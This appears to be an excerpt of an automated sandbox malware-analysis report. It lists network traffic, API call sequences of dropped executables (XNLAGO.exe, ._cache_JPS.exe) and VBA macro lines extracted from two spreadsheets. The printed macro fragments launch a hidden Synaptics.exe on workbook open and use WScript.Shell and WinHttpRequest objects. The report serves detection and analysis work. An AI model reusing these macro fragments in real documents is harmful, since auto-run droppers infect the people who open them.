                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49762 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49761 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49777 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49778 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49787 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49788 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49826 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49825 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49838 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49836 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49845 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49847 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49878 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49879 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49892 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49893 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49890 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49891 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49912 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49913 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49914 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49920 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49948 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49950 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49976 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49977 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49983 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49984 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49991 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49993 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:50001 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:50005 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:50030 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:50032 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:50073 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:50075 version: TLS 1.2
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00AE7099
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00AE7294
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00787294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00787294
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AE7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00AE7099
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AD4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,2_2_00AD4342
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00AFF5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_0079F5D0

                              System Summary

                              barindex
                              Document contains an embedded VBA macro with suspicious strings
                              Source: J6UTCx7N.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: J6UTCx7N.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: J6UTCx7N.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: J6UTCx7N.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: J6UTCx7N.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: J6UTCx7N.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: J6UTCx7N.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: J6UTCx7N.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: J6UTCx7N.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: J6UTCx7N.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: J6UTCx7N.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Document contains an embedded VBA with functions possibly related to ADO stream file operations
                              Source: J6UTCx7N.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: AFWAAFRXKO.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Document contains an embedded VBA with functions possibly related to HTTP operations
                              Source: J6UTCx7N.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: AFWAAFRXKO.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                              Source: J6UTCx7N.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: AFWAAFRXKO.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Windows Scripting host queries suspicious COM object (likely to drop second stage)
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00A929C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_00A929C2
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00B002AA NtdllDialogWndProc_W,2_2_00B002AA
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFE769 NtdllDialogWndProc_W,CallWindowProcW,2_2_00AFE769
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_00AFEAA6
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFEA4E NtdllDialogWndProc_W,2_2_00AFEA4E
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_00AFECBC
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AAAC99 NtdllDialogWndProc_W,2_2_00AAAC99
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AAAD5C NtdllDialogWndProc_W,74C3C8D0,NtdllDialogWndProc_W,2_2_00AAAD5C
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_00AFEFA8
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AAAFB4 GetParent,NtdllDialogWndProc_W,2_2_00AAAFB4
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFF0A1 SendMessageW,NtdllDialogWndProc_W,2_2_00AFF0A1
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_00AFF122
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFF3AB NtdllDialogWndProc_W,2_2_00AFF3AB
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFF3DA NtdllDialogWndProc_W,2_2_00AFF3DA
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFF37C NtdllDialogWndProc_W,2_2_00AFF37C
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFF425 NtdllDialogWndProc_W,2_2_00AFF425
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFF45A ClientToScreen,NtdllDialogWndProc_W,2_2_00AFF45A
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFF594 GetWindowLongW,NtdllDialogWndProc_W,2_2_00AFF594
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00AFF5D0
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AAB7F2 NtdllDialogWndProc_W,2_2_00AAB7F2
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AAB845 NtdllDialogWndProc_W,2_2_00AAB845
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFFE80 NtdllDialogWndProc_W,2_2_00AFFE80
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,2_2_00AFFF91
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,2_2_00AFFF04
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_007329C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,10_2_007329C2
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_007A02AA NtdllDialogWndProc_W,10_2_007A02AA
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079E769 NtdllDialogWndProc_W,CallWindowProcW,10_2_0079E769
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079EA4E NtdllDialogWndProc_W,10_2_0079EA4E
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,10_2_0079EAA6
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,10_2_0079ECBC
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0074AC99 NtdllDialogWndProc_W,10_2_0074AC99
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0074AD5C NtdllDialogWndProc_W,74C3C8D0,NtdllDialogWndProc_W,10_2_0074AD5C
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0074AFB4 GetParent,NtdllDialogWndProc_W,10_2_0074AFB4
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,10_2_0079EFA8
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079F0A1 SendMessageW,NtdllDialogWndProc_W,10_2_0079F0A1
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,10_2_0079F122
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079F37C NtdllDialogWndProc_W,10_2_0079F37C
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079F3DA NtdllDialogWndProc_W,10_2_0079F3DA
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079F3AB NtdllDialogWndProc_W,10_2_0079F3AB
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079F45A ClientToScreen,NtdllDialogWndProc_W,10_2_0079F45A
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079F425 NtdllDialogWndProc_W,10_2_0079F425
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_0079F5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079F594 GetWindowLongW,NtdllDialogWndProc_W,10_2_0079F594
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0074B7F2 NtdllDialogWndProc_W,10_2_0074B7F2
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0074B845 NtdllDialogWndProc_W,10_2_0074B845
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079FE80 NtdllDialogWndProc_W,10_2_0079FE80
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,10_2_0079FF04
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,10_2_0079FF91
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AD70AE: CreateFileW,DeviceIoControl,CloseHandle,2_2_00AD70AE
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ACB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74D05590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,2_2_00ACB9F1
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AD82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00AD82D0
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_007782D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_007782D0
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AF30AD2_2_00AF30AD
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AA36802_2_00AA3680
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00A9DCD02_2_00A9DCD0
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00A9A0C02_2_00A9A0C0
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AB01832_2_00AB0183
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AD220C2_2_00AD220C
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00A985302_2_00A98530
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00A966702_2_00A96670
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AB06772_2_00AB0677
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFA8DC2_2_00AFA8DC
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AB0A8F2_2_00AB0A8F
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00A96BBC2_2_00A96BBC
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ABAC832_2_00ABAC83
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AAAD5C2_2_00AAAD5C
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AC4EBF2_2_00AC4EBF
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AB0EC42_2_00AB0EC4
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AC113E2_2_00AC113E
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AB12F92_2_00AB12F9
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AC542F2_2_00AC542F
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AFF5D02_2_00AFF5D0
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AC599F2_2_00AC599F
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00A9BDF02_2_00A9BDF0
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ABBDF62_2_00ABBDF6
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00A95D322_2_00A95D32
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AB1E5A2_2_00AB1E5A
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADBFB82_2_00ADBFB8
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AC7FFD2_2_00AC7FFD
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ABDF692_2_00ABDF69
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0073DCD010_2_0073DCD0
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0073A0C010_2_0073A0C0
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0075018310_2_00750183
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0077220C10_2_0077220C
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0073853010_2_00738530
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0075067710_2_00750677
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0073667010_2_00736670
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079A8DC10_2_0079A8DC
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00750A8F10_2_00750A8F
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00736BBC10_2_00736BBC
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0075AC8310_2_0075AC83
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0074AD5C10_2_0074AD5C
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00750EC410_2_00750EC4
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00764EBF10_2_00764EBF
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_007930AD10_2_007930AD
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0076113E10_2_0076113E
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_007512F910_2_007512F9
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0076542F10_2_0076542F
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0079F5D010_2_0079F5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0074368010_2_00743680
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0076599F10_2_0076599F
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00735D3210_2_00735D32
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0073BDF010_2_0073BDF0
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0075BDF610_2_0075BDF6
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00751E5A10_2_00751E5A
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0075DF6910_2_0075DF69
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_00767FFD10_2_00767FFD
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0077BFB810_2_0077BFB8
                              Source: J6UTCx7N.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: J6UTCx7N.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: String function: 00AB7750 appears 42 times
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: String function: 00AAF885 appears 68 times
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: String function: 00757750 appears 42 times
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: String function: 0074F885 appears 68 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7604 -s 3432
